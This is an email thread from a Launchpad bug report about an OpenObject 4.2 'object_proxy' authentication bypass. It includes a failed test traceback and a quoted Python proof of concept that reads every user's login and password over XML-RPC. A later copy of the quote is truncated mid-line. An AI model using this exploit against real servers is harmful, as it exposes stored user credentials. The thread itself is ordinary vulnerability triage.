./get_all_users_pass.py "nueva_2"
Traceback (most recent call last):
File "./get_all_users_pass.py", line 27, in <module>
db_list = dbsock.list()
File "/usr/lib/python2.6/xmlrpclib.py", line 1199, in __call__
return self.__send(self.__name, args)
File "/usr/lib/python2.6/xmlrpclib.py", line 1489, in __request
verbose=self.__verbose
File "/usr/lib/python2.6/xmlrpclib.py", line 1237, in request
errcode, errmsg, headers = h.getreply()
File "/usr/lib/python2.6/httplib.py", line 1048, in getreply
response = self._conn.getresponse()
File "/usr/lib/python2.6/httplib.py", line 974, in getresponse
response.begin()
File "/usr/lib/python2.6/httplib.py", line 391, in begin
version, status, reason = self._read_status()
File "/usr/lib/python2.6/httplib.py", line 349, in _read_status
line = self.fp.readline()
File "/usr/lib/python2.6/socket.py", line 397, in readline
data = recv(1)
socket.error: [Errno 104] Connection reset by peer
> Hi, i tested in stable revno.2041 and the xploit is invalid
>
> --
> [4.2] Netsvc object_proxy bypass
> https://bugs.launchpad.net/bugs/452373
> You received this bug notification because you are subscribed to
> OpenObject.
>
> Status in OpenObject Server: Invalid
>
> Bug description:
> It's possible to call any method of object xml-rpc interface using another
> interface called object_proxy. The only requisit is that server is
> initialitzed (eg. someone do the login or tries to login).
>
> This is solved in 5.0 but not in 4.2.
> In bazaar 4.2 is tagged as mature and I can't undersant why this patch is
> not ported to this branch.
>
> I attach a simple patch that we use in our production servers which
> someones still working on 4.2 version.
>
> Proof of concept:
>
> sock = xmlrpclib.ServerProxy('http://127.0.0.1:8069/xmlrpc/object_proxy')
> ids = sock.execute('terp', 1, 'res.users', 'search', [])
> f = sock.execute('terp', 1, 'res.users', 'read', ids, ['id', 'login',
> 'password'])
> for u in f:
> print ' user: %s pass: %s' % (u['login'], u['password'])
>
>
>
Hi....
Traceback (most recent call last):
File "./get_
db_list = dbsock.list()
File "/usr/lib/
return self.__
File "/usr/lib/
verbose=
File "/usr/lib/
errcode, errmsg, headers = h.getreply()
File "/usr/lib/
response = self._conn.
File "/usr/lib/
response.
File "/usr/lib/
version, status, reason = self._read_status()
File "/usr/lib/
line = self.fp.readline()
File "/usr/lib/
data = recv(1)
socket.error: [Errno 104] Connection reset by peer
on revno: 1999
2010/4/26 Cristian Salamea (GnuThink) <email address hidden>
> Hi, i tested in stable revno.2041 and the xploit is invalid /bugs.launchpad .net/bugs/ 452373 ServerProxy( 'http:// 127.0.0. 1:8069/ xmlrpc/ object_ proxy') 'terp', 1, 'res.users', 'search', []) 'terp', 1, 'res.users', 'read', ids, ['id', 'login',
>
> --
> [4.2] Netsvc object_proxy bypass
> https:/
> You received this bug notification because you are subscribed to
> OpenObject.
>
> Status in OpenObject Server: Invalid
>
> Bug description:
> It's possible to call any method of object xml-rpc interface using another
> interface called object_proxy. The only requisit is that server is
> initialitzed (eg. someone do the login or tries to login).
>
> This is solved in 5.0 but not in 4.2.
> In bazaar 4.2 is tagged as mature and I can't undersant why this patch is
> not ported to this branch.
>
> I attach a simple patch that we use in our production servers which
> someones still working on 4.2 version.
>
> Proof of concept:
>
> sock = xmlrpclib.
> ids = sock.execute(
> f = sock.execute(
> 'password'])
> for u in f:
> print ' user: %s pass: %s' % (u['login'], u['password'])
>
>
>
--
Saludos Cordiales
Nhomar G. Hernandez M. geronimo. com.ve openerp. netquatro. com
+58-414-4110269
+58-212-6615932
+58-212-9536734 ext 124
+58-212-9512643
Web-Blog: http://
Servicios IT: http://
Linux-Counter: 467724
Correos:
<email address hidden>
<email address hidden>